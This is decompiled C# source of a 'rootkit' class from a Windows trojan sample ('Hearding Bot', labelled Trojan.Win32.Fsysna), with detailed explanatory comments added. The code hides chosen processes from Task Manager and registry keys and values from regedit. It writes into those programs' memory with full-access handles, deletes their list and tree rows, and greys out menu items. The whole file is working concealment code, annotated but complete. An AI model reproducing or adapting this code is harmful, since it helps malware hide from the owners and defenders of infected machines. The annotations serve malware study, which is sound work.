MalwareSourceCode/MSIL/Trojan/Win32/F/Trojan.Win32.Fsysna.dljm-a7abcca3397d1344b43d53c1427609ca1808f1991c5d2b158fd67c1ea3e6f19a/rootkit.cs

// Decompiled with JetBrains decompiler
// Type: Hearding_Bot.rootkit
// Assembly: Hearding Bot, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 931E7B23-EA6E-4139-8BD0-1A4E0BF9E258
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Fsysna.dljm-a7abcca3397d1344b43d53c1427609ca1808f1991c5d2b158fd67c1ea3e6f19a.exe
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Management;
using System.Runtime.InteropServices;
using System.Threading;
namespace Hearding_Bot
{
// User-mode "rootkit" that hides entries from two Windows administration UIs:
// Task Manager's process list and regedit's value list / key tree.  It never
// touches the underlying processes or registry data; it only deletes rows from
// those applications' ListView/TreeView controls via window messages (LVM_*/TVM_*)
// and cross-process memory (OpenProcess / VirtualAllocEx / ReadProcessMemory /
// WriteProcessMemory against taskmgr.exe and regedit.exe).  Any enumeration that
// does not go through those two windows (another process viewer, WMI, the registry
// API) therefore still sees everything, and the full-access handle opens plus the
// remote allocations into taskmgr/regedit are the observable behaviour of this
// component.  Polling threads are started lazily by the public Hide* entry points.
// Message and flag values below are numeric because the decompiler dropped the
// symbolic names; the ones that could be identified are noted at each method.
internal class rootkit
{
// Set by Initialize(1|2|3) once the corresponding polling thread has been started.
public static bool Initialized1;
public static bool Initialized2;
public static bool Initialized3;
// Last time the Task Manager menu command was re-sent (throttled to >1 s in _HideProcess).
public static DateTime TaskManagerTime = DateTime.Now;
// Item count last observed in Task Manager's list view; a change triggers a rescan.
public static int TaskManagerCount;
// Set by HideProcess to force the next _HideProcess pass to rescan regardless of the count.
public static bool TaskManagerReload;
// Registry key paths to hide from regedit's tree, each stored as lower-cased
// path segments (key name split on '\'); see HideRegistryKey and ExtractRegKey.
public static List<string[]> RegistryKeys = new List<string[]>();
// Starts the background polling thread for one hiding mode:
//   1 - rescans Task Manager every 500 ms (_HideProcess);
//   2 - hides registry values in regedit (_HideRegistryValue);
//   3 - hides registry keys in regedit (_HideRegistryKey).
// Modes 2 and 3 poll every 10 ms while a regedit window is found and every
// 250 ms otherwise (the helpers return true only when regedit was located).
// The threads loop forever, are not marked IsBackground, and nothing stops them.
// Nothing synchronises the Initialized flags, so two concurrent callers could
// each start a thread for the same mode.  Any other proc value is ignored.
public static void Initialize(int proc)
{
switch (proc)
{
case 1:
new Thread((ThreadStart) (() =>
{
while (true)
{
rootkit._HideProcess();
Thread.Sleep(500);
}
})).Start();
rootkit.Initialized1 = true;
break;
case 2:
new Thread((ThreadStart) (() =>
{
while (true)
Thread.Sleep(rootkit._HideRegistryValue() ? 10 : 250);
})).Start();
rootkit.Initialized2 = true;
break;
case 3:
new Thread((ThreadStart) (() =>
{
while (true)
Thread.Sleep(rootkit._HideRegistryKey() ? 10 : 250);
})).Start();
rootkit.Initialized3 = true;
break;
}
}
// One polling pass over Task Manager.  Finds the first "taskmgr" process,
// locates its process ListView, removes every row that matches a registered
// Proc (process-name prefix plus owning user) and tampers with one of its menus.
// Every failure (no Task Manager running, control not found, cross-process read
// errors) is swallowed by the bare catch, so the caller learns nothing.
// Constants: 273 = WM_COMMAND, 4100 = LVM_GETITEMCOUNT, 4104 = LVM_DELETEITEM,
//   showCmd 1/3 = SW_SHOWNORMAL/SW_SHOWMAXIMIZED, EnableMenuItem flag 1 = MF_GRAYED.
public static void _HideProcess()
{
try
{
// Throws IndexOutOfRangeException when Task Manager is not running; caught below.
IntPtr mainWindowHandle = Process.GetProcessesByName("taskmgr")[0].MainWindowHandle;
rootkit.Api.WindowPlacement lpwndpl = new rootkit.Api.WindowPlacement();
lpwndpl.length = Marshal.SizeOf((object) lpwndpl);
rootkit.Api.GetWindowPlacement(mainWindowHandle, ref lpwndpl);
// Window is shown normally or maximised; only then is redraw locked while rows are removed.
bool flag1 = lpwndpl.showCmd == 1 || lpwndpl.showCmd == 3;
// Control id 1009 under the first child window; appears to be the Processes list view (not confirmed here).
IntPtr dlgItem = rootkit.Api.GetDlgItem(rootkit.Api.FindWindowEx(mainWindowHandle, IntPtr.Zero, (string) null, (string) null), 1009);
// Third top-level menu, its second sub-menu, and the command id of the
// sub-menu's first item; which commands these are is not recoverable from this code.
IntPtr menu = rootkit.Api.GetMenu(mainWindowHandle);
IntPtr subMenu1 = rootkit.Api.GetSubMenu(menu, 2);
IntPtr subMenu2 = rootkit.Api.GetSubMenu(subMenu1, 1);
uint menuItemId = rootkit.Api.GetMenuItemID(subMenu1, 0);
if (subMenu2 != IntPtr.Zero)
{
// Invokes the sub-menu's fourth item via WM_COMMAND, then removes the sub-menu.
// RemoveMenu is handed the sub-menu *handle* cast to uint as the position and
// flag 1 (MF_GRAYED rather than MF_BYPOSITION); whether that works as intended is unclear.
rootkit.Api.SendMessage(mainWindowHandle, 273U, (IntPtr) (long) rootkit.Api.GetMenuItemID(subMenu2, 3), IntPtr.Zero);
rootkit.Api.RemoveMenu(subMenu1, (uint) (int) subMenu2, 1U);
}
// Grays the first item of that sub-menu.
rootkit.Api.EnableMenuItem(menu, menuItemId, 1U);
if (flag1)
rootkit.Api.LockWindowUpdate(dlgItem);
// At most once per second, re-sends that menu command to the main window (presumably a refresh).
if ((DateTime.Now - rootkit.TaskManagerTime).TotalMilliseconds > 1000.0)
{
rootkit.Api.SendMessage(mainWindowHandle, 273U, (IntPtr) (long) menuItemId, IntPtr.Zero);
rootkit.TaskManagerTime = DateTime.Now;
}
// Forced full GC on every 500 ms pass; purpose unclear.
GC.Collect();
// Current row count of the list view (LVM_GETITEMCOUNT).
int num = (int) rootkit.Api.SendMessage(dlgItem, 4100U, IntPtr.Zero, "");
// Rescan only when the row count changed or HideProcess requested a reload.
if (num != rootkit.TaskManagerCount || rootkit.TaskManagerReload)
{
rootkit.TaskManagerReload = false;
rootkit.TaskManagerCount = num;
for (int index1 = 0; index1 < num; ++index1)
{
// Reads up to 10 columns of the row, lower-cased; stops early when a column
// repeats column 0, which appears to signal reading past the last column.
string[] strArray = new string[10];
for (int subitem = 0; subitem < 10; ++subitem)
{
strArray[subitem] = rootkit.GetListViewItem(dlgItem, index1, subitem).ToLower();
if (subitem > 0 && strArray[subitem] == strArray[0])
break;
}
// Proc.List is enumerated without the lock that Proc's constructor takes when
// adding, so a concurrent HideProcess can throw InvalidOperationException (swallowed below).
foreach (rootkit.Proc proc in rootkit.Proc.List)
{
// flag2: some column starts with the process name; flag3: some column equals the user.
bool flag2 = false;
bool flag3 = false;
for (int index2 = 0; index2 < 10 && strArray[index2] != null && (!flag2 || !flag3); ++index2)
{
if (strArray[index2].StartsWith(proc.Name))
flag2 = true;
else if (strArray[index2] == proc.User)
flag3 = true;
}
if (flag2 && flag3)
{
// LVM_DELETEITEM, then re-examine the same index because the rows shift up;
// the cached count is adjusted so the next pass does not see a spurious change.
rootkit.Api.SendMessage(dlgItem, 4104U, (IntPtr) index1--, IntPtr.Zero);
--rootkit.TaskManagerCount;
break;
}
}
}
}
if (!flag1)
return;
// Not in a finally: if anything above throws after the lock, this unlock is never reached.
rootkit.Api.LockWindowUpdate(IntPtr.Zero);
}
catch
{
// Swallows everything, including the "no Task Manager" case, so the loop runs silently.
}
}
// One polling pass over regedit's value list.  Returns true when a regedit main
// window was found (Initialize uses this to pick the polling interval), false
// otherwise.  When the key shown in regedit's status bar matches a registered
// RegVal, the matching value rows are deleted from the values ListView.
// Constants: 4100 = LVM_GETITEMCOUNT, 4104 = LVM_DELETEITEM.
public static bool _HideRegistryValue()
{
bool flag = false;
try
{
// Throws when regedit is not running; flag stays false.
IntPtr mainWindowHandle = Process.GetProcessesByName("regedit")[0].MainWindowHandle;
flag = true;
// Result discarded; this call has no effect.
rootkit.Api.FindWindowEx(mainWindowHandle, IntPtr.Zero, (string) null, (string) null);
// Control 2: the values list view (LVM messages are sent to it below).
IntPtr dlgItem = rootkit.Api.GetDlgItem(mainWindowHandle, 2);
// Control 3: the status bar, which shows the currently selected key path.
string statusBarText = rootkit.GetStatusBarText(rootkit.Api.GetDlgItem(mainWindowHandle, 3), 0);
// Drop everything up to the first '\' (presumably the "Computer\" prefix) and
// lower-case so it compares with RegVal.Key, which is RegistryKey.Name lower-cased.
string lower = statusBarText.Substring(statusBarText.IndexOf("\\") + 1).ToLower();
// num1: number of registered values under this key; registryKey: RegKey of the last match.
int num1 = 0;
RegistryKey registryKey = (RegistryKey) null;
foreach (rootkit.RegVal regVal in rootkit.RegVal.List)
{
if (regVal.Key == lower)
{
registryKey = regVal.RegKey;
++num1;
}
}
if (num1 > 0)
{
int num2 = (int) rootkit.Api.SendMessage(dlgItem, 4100U, IntPtr.Zero, IntPtr.Zero);
// Expected row count once hidden: live ValueCount plus one extra row (presumably
// "(Default)") minus the hidden values.  Only edit when the list shows more than that.
if (num2 != registryKey.ValueCount + 1 - num1)
{
rootkit.Api.LockWindowUpdate(dlgItem);
// Starts at 1, skipping row 0 (presumably "(Default)").  num2 is not reduced after
// deletions, so trailing indices may be past the end of the list.
for (int index = 1; index < num2; ++index)
{
foreach (rootkit.RegVal regVal in rootkit.RegVal.List)
{
// Delete the row whose name column matches, then re-examine the same index.
if (regVal.Key == lower && regVal.Value == rootkit.GetListViewItem(dlgItem, index, 0).ToLower())
rootkit.Api.SendMessage(dlgItem, 4104U, (IntPtr) index--, IntPtr.Zero);
}
}
// Not in a finally: an exception inside the loop leaves the list view locked.
rootkit.Api.LockWindowUpdate(IntPtr.Zero);
}
}
}
catch
{
// All errors swallowed; flag still reports whether regedit was found.
}
return flag;
}
// One polling pass over regedit's key tree.  Returns true when a regedit main
// window was found, false otherwise.  Walks the TreeView (control 1) from the
// first child of the root and deletes any node whose path matches RegistryKeys.
// Constants: 4362 = TVM_GETNEXTITEM with wParam 0 = TVGN_ROOT / 4 = TVGN_CHILD;
//   2035711 = 0x1F0FFF = PROCESS_ALL_ACCESS; 4096 = MEM_COMMIT; 4 = PAGE_READWRITE;
//   32768 = MEM_RELEASE.
public static bool _HideRegistryKey()
{
bool flag = false;
try
{
// Throws when regedit is not running; flag stays false.
IntPtr mainWindowHandle = Process.GetProcessesByName("regedit")[0].MainWindowHandle;
flag = true;
// Result discarded; this call has no effect.
rootkit.Api.FindWindowEx(mainWindowHandle, IntPtr.Zero, (string) null, (string) null);
// Control 1: the key tree view (TVM messages are sent to it).
IntPtr dlgItem = rootkit.Api.GetDlgItem(mainWindowHandle, 1);
// Handle of the root node's first child (TVGN_CHILD of TVGN_ROOT).
int index = rootkit.Api.SendMessage(dlgItem, 4362, 4U, (IntPtr) rootkit.Api.SendMessage(dlgItem, 4362, 0U, IntPtr.Zero));
// 1 KB local buffer that receives the TVITEM + text copied back from regedit.
IntPtr num1 = Marshal.AllocHGlobal(1024);
int lpwdProcessID;
rootkit.Api.GetWindowThreadProcessId(dlgItem, out lpwdProcessID);
// Opens regedit with full access and allocates a 1 KB read/write buffer inside it:
// the TVM_GETITEM text pointer must be valid in regedit's own address space.
IntPtr num2 = rootkit.Api.OpenProcess(2035711U, false, lpwdProcessID);
IntPtr num3 = rootkit.Api.VirtualAllocEx(num2, IntPtr.Zero, 1024U, 4096U, 4U);
rootkit.ExtractRegKey(num2, dlgItem, index, num1, num3, new List<string>());
// Cleanup is not in a finally: if ExtractRegKey throws, the local buffer, the
// remote allocation and the process handle all leak.
Marshal.FreeHGlobal(num1);
rootkit.Api.VirtualFreeEx(num2, num3, 0, 32768U);
rootkit.Api.CloseHandle(num2);
GC.Collect();
}
catch
{
// All errors swallowed; flag still reports whether regedit was found.
}
return flag;
}
// Public entry: hides `process` from Task Manager.  Starts the polling thread on
// first use; the Proc constructor registers itself in Proc.List (the local is
// otherwise unused) and the reload flag forces an immediate rescan.
public static void HideProcess(Process process)
{
if (!rootkit.Initialized1)
rootkit.Initialize(1);
rootkit.Proc proc = new rootkit.Proc(process);
rootkit.TaskManagerReload = true;
}
// Public entry: hides value `value` of `key` from regedit's value list.  Starts
// the polling thread on first use; the RegVal constructor registers itself in
// RegVal.List (the local is otherwise unused).
public static void HideRegistryValue(RegistryKey key, string value)
{
if (!rootkit.Initialized2)
rootkit.Initialize(2);
rootkit.RegVal regVal = new rootkit.RegVal(key, value);
}
// Public entry: hides `key` from regedit's tree.  The key's full name (hive
// included) is lower-cased and split on '\' so ExtractRegKey can compare it
// segment by segment against the tree path.  RegistryKeys is appended without
// any lock while ExtractRegKey enumerates it on the polling thread.
public static void HideRegistryKey(RegistryKey key)
{
if (!rootkit.Initialized3)
rootkit.Initialize(3);
rootkit.RegistryKeys.Add(key.Name.ToLower().Split('\\'));
}
// Recursive walk of regedit's TreeView starting at node handle `index`,
// iterating siblings with TVM_GETNEXTITEM/TVGN_NEXT.  For each node the text is
// fetched by writing a TVITEM (TVIF_TEXT) into `lpRemoteBuffer` inside regedit,
// sending TVM_GETITEM, and reading the buffer back into `lpLocalBuffer`.
// `stack` holds the lower-cased names of the ancestors; a node is deleted
// (TVM_DELETEITEM) when stack + its own name equals an entry of RegistryKeys,
// otherwise the walk recurses into its children with a copied stack.
// Parameters: hProcess - handle to regedit with VM read/write rights;
//   hTreeview - the tree control; index - first node handle to examine (0 = none);
//   lpLocalBuffer / lpRemoteBuffer - 1 KB buffers, local and inside regedit;
//   stack - ancestor names, mutated and restored around each node.
// Constants: 4362 = TVM_GETNEXTITEM (1 = TVGN_NEXT, 4 = TVGN_CHILD),
//   4364 = TVM_GETITEM, 4353 = TVM_DELETEITEM, mask 1 = TVIF_TEXT.
// Pointer arithmetic goes through (int) casts, so this only works in a 32-bit process.
public static void ExtractRegKey(
IntPtr hProcess,
IntPtr hTreeview,
int index,
IntPtr lpLocalBuffer,
IntPtr lpRemoteBuffer,
List<string> stack)
{
for (; index > 0; index = rootkit.Api.SendMessage(hTreeview, 4362, 1U, (IntPtr) index))
{
// TVITEM whose pszText points just past the struct in the remote buffer (255 chars max).
rootkit.Api.WriteProcessMemory(hProcess, lpRemoteBuffer, ref new rootkit.Api.TvItem()
{
mask = 1,
hItem = (IntPtr) index,
pszText = (IntPtr) ((int) lpRemoteBuffer + Marshal.SizeOf(typeof (rootkit.Api.TvItem))),
cchTextMax = (int) byte.MaxValue
}, Marshal.SizeOf(typeof (rootkit.Api.TvItem)), IntPtr.Zero);
// regedit fills the TVITEM text in its own memory; copy the whole 1 KB back.
rootkit.Api.SendMessage(hTreeview, 4364, 0U, lpRemoteBuffer);
rootkit.Api.ReadProcessMemory(hProcess, lpRemoteBuffer, lpLocalBuffer, 1024, IntPtr.Zero);
string lower = Marshal.PtrToStringAnsi((IntPtr) ((int) lpLocalBuffer + Marshal.SizeOf(typeof (rootkit.Api.TvItem)))).ToLower();
// Always true here (loop condition); redundant.
if (index > 0)
{
// First child of this node, or 0 if it has none.
int index1 = rootkit.Api.SendMessage(hTreeview, 4362, 4U, (IntPtr) index);
stack.Add(lower);
// flag1: the path stack (ancestors + this node) equals one registered key path:
// same depth and every segment equal.
bool flag1 = false;
foreach (string[] registryKey in rootkit.RegistryKeys)
{
if (stack.Count == registryKey.Length)
{
bool flag2 = true;
for (int index2 = 0; index2 < stack.Count; ++index2)
{
if (stack[index2] != registryKey[index2])
{
flag2 = false;
break;
}
}
if (flag2)
{
flag1 = true;
break;
}
}
}
stack.RemoveAt(stack.Count - 1);
// TVM_DELETEITEM removes the node from the view (wParam 4 appears to be ignored by that
// message).  The loop then asks for the next sibling of the deleted handle; presumably
// that yields 0 and ends this level's walk - verify.
if (flag1)
rootkit.Api.SendMessage(hTreeview, 4353, 4U, (IntPtr) index);
else if (index1 > 0)
{
// Recurse with an independent copy of the stack; the original is restored below.
stack.Add(lower);
rootkit.ExtractRegKey(hProcess, hTreeview, index1, lpLocalBuffer, lpRemoteBuffer, new List<string>((IEnumerable<string>) stack.ToArray()));
stack.RemoveAt(stack.Count - 1);
}
}
}
}
// Reads part `index` of a status-bar control owned by another process.
// Sends SB_GETTEXTLENGTHW (1036) to size the text, allocates that many UTF-16
// bytes inside the owning process, asks it to fill them with SB_GETTEXTW (1037),
// copies them out with ReadProcessMemory and decodes the little-endian UTF-16
// code units by hand.  Returns the text; none of the Win32 return values is
// checked, so a failed step yields an empty or garbage string rather than an error.
// Constants: 2033663 = 0x1F07FF (PROCESS_ALL_ACCESS without 0x0800),
//   12288 = MEM_COMMIT|MEM_RESERVE, 4 = PAGE_READWRITE.
// The remote allocation is never freed (no VirtualFreeEx), so every call leaks
// memory in the target, and the handle is closed only on the non-throwing path.
public static string GetStatusBarText(IntPtr handle, int index)
{
// Low 16 bits of the SB_GETTEXTLENGTH result are the length in characters; doubled for bytes.
int dwSize = ((int) rootkit.Api.SendMessage(handle, 1036U, (IntPtr) index, IntPtr.Zero) & (int) ushort.MaxValue) * 2;
uint lpdwProcessId = 0;
// Thread id is discarded; only the owning process id is used.
int windowThreadProcessId = (int) rootkit.Api.GetWindowThreadProcessId(handle, out lpdwProcessId);
IntPtr num1 = rootkit.Api.OpenProcess(2033663U, false, (int) lpdwProcessId);
IntPtr num2 = rootkit.Api.VirtualAllocEx(num1, IntPtr.Zero, (uint) dwSize, 12288U, 4U);
int numberOfBytesRead = 0;
byte[] buffer = new byte[dwSize];
rootkit.Api.SendMessage(handle, 1037U, (IntPtr) index, num2);
rootkit.Api.ReadProcessMemory(num1, num2, buffer, dwSize, out numberOfBytesRead);
// Manual UTF-16LE decode: each pair of bytes (low, high) becomes one char.
// dwSize is even, so index1 + 1 never runs past the buffer.
string statusBarText = "";
for (int index1 = 0; index1 < buffer.Length; index1 += 2)
statusBarText += (string) (object) Convert.ToChar((int) buffer[index1] | (int) buffer[index1 + 1] << 8);
rootkit.Api.CloseHandle(num1);
return statusBarText;
}
// Reads the text of cell (index, subitem) from a ListView owned by another
// process: writes an LVITEM (LVIF_TEXT, pszText pointing just past the struct,
// 50 chars max) into a 1 KB buffer allocated inside that process, sends
// LVM_GETITEMA (4101), reads the buffer back and returns the ANSI string.
// Opens and closes a PROCESS_ALL_ACCESS (2035711 = 0x1F0FFF) handle and
// allocates/frees the remote buffer on every call; cleanup is not in a finally.
// (int) pointer arithmetic means 32-bit only.  Win32 return values are not checked.
public static string GetListViewItem(IntPtr hWnd, int index, int subitem)
{
rootkit.Api.LvItem buffer = new rootkit.Api.LvItem();
// Local copy of the remote buffer.
IntPtr num1 = Marshal.AllocHGlobal(1024);
uint lpdwProcessId;
// Thread id is discarded; only the owning process id is used.
int windowThreadProcessId = (int) rootkit.Api.GetWindowThreadProcessId(hWnd, out lpdwProcessId);
IntPtr num2 = rootkit.Api.OpenProcess(2035711U, false, (int) lpdwProcessId);
// 1 KB committed read/write buffer inside the target (4096 = MEM_COMMIT, 4 = PAGE_READWRITE).
IntPtr num3 = rootkit.Api.VirtualAllocEx(num2, IntPtr.Zero, 1024U, 4096U, 4U);
buffer.mask = 1U;
buffer.iItem = index;
buffer.iSubItem = subitem;
// Text buffer lives immediately after the LvItem struct in the remote allocation.
buffer.pszText = (IntPtr) ((int) num3 + Marshal.SizeOf(typeof (rootkit.Api.LvItem)));
buffer.cchTextMax = 50;
// Only SizeOf(LvItem) bytes are written; LvItem is a prefix of the native LVITEM
// (no lParam and later members), which appears harmless since only LVIF_TEXT is requested.
rootkit.Api.WriteProcessMemory(num2, num3, ref buffer, Marshal.SizeOf(typeof (rootkit.Api.LvItem)), 0);
rootkit.Api.SendMessage(hWnd, 4101U, IntPtr.Zero, num3);
rootkit.Api.ReadProcessMemory(num2, num3, num1, 1024, 0);
string stringAnsi = Marshal.PtrToStringAnsi((IntPtr) ((int) num1 + Marshal.SizeOf(typeof (rootkit.Api.LvItem))));
Marshal.FreeHGlobal(num1);
// 32768 = MEM_RELEASE.
rootkit.Api.VirtualFreeEx(num2, num3, 0, 32768U);
rootkit.Api.CloseHandle(num2);
return stringAnsi;
}
// Returns the owner account name of `process` via WMI (Win32_Process.GetOwner),
// or "" when the query returns no row or GetOwner reports a non-zero status.
// The query is built by concatenation, but only with the integer process id, so
// there is no injection surface.  The searcher and result objects are not disposed.
public static string GetProcessUser(Process process)
{
foreach (ManagementObject managementObject in new ManagementObjectSearcher("Select * From Win32_Process Where ProcessID = " + (object) process.Id).Get())
{
// GetOwner writes the user name into its out parameter (args[0]); 0 means success.
string[] args = new string[1]{ "" };
if (Convert.ToInt32(managementObject.InvokeMethod("GetOwner", (object[]) args)) == 0)
return args[0];
}
return "";
}
// A process to hide: lower-cased process name and owner, matched against Task
// Manager rows in _HideProcess.  Constructing one registers it in the shared
// List (the add is locked; the reader in _HideProcess does not lock).
public class Proc
{
public static List<rootkit.Proc> List = new List<rootkit.Proc>();
public string Name;
public string User;
public Proc(Process proc)
{
this.Name = proc.ProcessName.ToLower();
// WMI lookup of the owning account; "" if it could not be determined.
this.User = rootkit.GetProcessUser(proc).ToLower();
lock (rootkit.Proc.List)
rootkit.Proc.List.Add(this);
}
}
// A registry value to hide: the owning key (kept live so ValueCount can be
// re-read), its lower-cased full name and the lower-cased value name, matched
// against regedit's value list in _HideRegistryValue.  Constructing one
// registers it in the shared List (the add is locked; readers do not lock).
public class RegVal
{
public static List<rootkit.RegVal> List = new List<rootkit.RegVal>();
public RegistryKey RegKey;
public string Key;
public string Value;
public RegVal(RegistryKey key, string value)
{
this.RegKey = key;
this.Key = key.Name.ToLower();
this.Value = value.ToLower();
lock (rootkit.RegVal.List)
rootkit.RegVal.List.Add(this);
}
}
// P/Invoke surface.  Several names are overloaded on parameter types (SendMessage
// with IntPtr / string / ref TvItem lParam and an int-returning variant;
// ReadProcessMemory / WriteProcessMemory with byte[], IntPtr or struct buffers and
// in/out byte counts; two GetWindowThreadProcessId shapes) - the decompiler kept
// each overload a caller above relies on.  The structs carry no explicit
// StructLayout and so use the default sequential layout when marshalled.
internal static class Api
{
[DllImport("user32.dll", SetLastError = true)]
public static extern IntPtr FindWindowEx(
IntPtr hwndParent,
IntPtr hwndChildAfter,
string lpszClass,
string lpszWindow);
[DllImport("user32.dll")]
public static extern IntPtr GetDlgItem(IntPtr hDlg, int nIDDlgItem);
// Declared but not used by this class.
[DllImport("user32.dll")]
public static extern bool EnableWindow(IntPtr hWnd, bool bEnable);
[DllImport("user32.dll")]
public static extern IntPtr GetMenu(IntPtr hWnd);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetSubMenu(IntPtr hMenu, int nPos);
[DllImport("user32.dll")]
public static extern uint GetMenuItemID(IntPtr hMenu, int nPos);
[DllImport("user32.dll")]
public static extern bool EnableMenuItem(IntPtr hMenu, uint uIDEnableItem, uint uEnable);
[DllImport("user32.dll")]
public static extern bool RemoveMenu(IntPtr hMenu, uint uPosition, uint uFlags);
// lParam as pointer: used for WM_COMMAND, LVM_DELETEITEM, LVM_GETITEMA and the status-bar messages.
[DllImport("user32.dll", CharSet = CharSet.Auto)]
public static extern IntPtr SendMessage(
IntPtr hWnd,
uint Msg,
IntPtr wParam,
IntPtr lParam);
// lParam as string: used with "" for LVM_GETITEMCOUNT in _HideProcess.
[DllImport("user32.dll", CharSet = CharSet.Auto)]
public static extern IntPtr SendMessage(
IntPtr hWnd,
uint Msg,
IntPtr wParam,
string lParam);
// lParam as TVITEM by reference: declared but not used by this class.
[DllImport("user32.dll", CharSet = CharSet.Auto)]
public static extern IntPtr SendMessage(
IntPtr hWnd,
[MarshalAs(UnmanagedType.U4)] int msg,
IntPtr wParam,
ref rootkit.Api.TvItem item);
// int-returning variant used for the TVM_* tree-view messages (item handles as int).
[DllImport("user32.dll")]
public static extern int SendMessage(IntPtr hWnd, int Msg, uint wParam, IntPtr lParam);
[DllImport("user32.dll")]
public static extern bool LockWindowUpdate(IntPtr hWndLock);
// Declared but not used by this class.
[DllImport("user32.dll")]
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
[DllImport("user32.dll")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool GetWindowPlacement(
IntPtr hWnd,
ref rootkit.Api.WindowPlacement lpwndpl);
[DllImport("kernel32.dll")]
public static extern IntPtr OpenProcess(
uint dwDesiredAccess,
[MarshalAs(UnmanagedType.Bool)] bool bInheritHandle,
int dwProcessId);
[DllImport("kernel32.dll")]
public static extern bool CloseHandle(IntPtr hObject);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr VirtualAllocEx(
IntPtr hProcess,
IntPtr lpAddress,
uint dwSize,
uint flAllocationType,
uint flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool VirtualFreeEx(
IntPtr hProcess,
IntPtr lpAddress,
int dwSize,
uint dwFreeType);
// byte[] destination with out byte count: used by GetStatusBarText.
[DllImport("kernel32.dll")]
public static extern bool ReadProcessMemory(
IntPtr hProcess,
IntPtr baseAddress,
byte[] buffer,
int dwSize,
out int numberOfBytesRead);
// Raw-pointer destination, byte count passed as int (0): used by GetListViewItem.
[DllImport("kernel32.dll")]
public static extern bool ReadProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
IntPtr lpBuffer,
int dwSize,
int lpNumberOfBytesRead);
// TVITEM source: used by ExtractRegKey.
[DllImport("kernel32.dll")]
public static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
ref rootkit.Api.TvItem buffer,
int dwSize,
IntPtr lpNumberOfBytesWritten);
// byte[] source: declared but not used by this class.
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
// LVITEM source: used by GetListViewItem.
[DllImport("kernel32.dll")]
public static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
ref rootkit.Api.LvItem buffer,
int dwSize,
int lpNumberOfBytesWritten);
// Raw-pointer destination, byte count passed as IntPtr (Zero): used by ExtractRegKey.
[DllImport("kernel32.dll")]
public static extern bool ReadProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
IntPtr lpBuffer,
int dwSize,
IntPtr lpNumberOfBytesRead);
[DllImport("user32.dll", SetLastError = true)]
public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
[DllImport("user32.dll")]
public static extern IntPtr GetWindowThreadProcessId(IntPtr hWnd, out int lpwdProcessID);
// Leading fields of the native LVITEM (stops before lParam); only mask, iItem,
// iSubItem, pszText and cchTextMax are populated by this class.
public struct LvItem
{
public uint mask;
public int iItem;
public int iSubItem;
public uint state;
public uint stateMask;
public IntPtr pszText;
public int cchTextMax;
public int iImage;
}
// Matches the native TVITEMEX layout up to iIntegral; only mask, hItem,
// pszText and cchTextMax are populated by this class.
public struct TvItem
{
public int mask;
public IntPtr hItem;
public int state;
public int stateMask;
public IntPtr pszText;
public int cchTextMax;
public int iImage;
public int iSelectedImage;
public int cChildren;
public IntPtr lParam;
public int iIntegral;
}
// Native RECT; fields are private because they only exist to size WindowPlacement.
public struct Rect
{
private int left;
private int top;
private int right;
private int bottom;
}
// Native POINT; fields are private because they only exist to size WindowPlacement.
public struct Point
{
private int x;
private int y;
}
// Native WINDOWPLACEMENT; only length (set before the call) and showCmd are used.
public struct WindowPlacement
{
public int length;
public int flags;
public int showCmd;
public rootkit.Api.Point ptMinPosition;
public rootkit.Api.Point ptMaxPosition;
public rootkit.Api.Rect rcNormalPosition;
}
}
}
}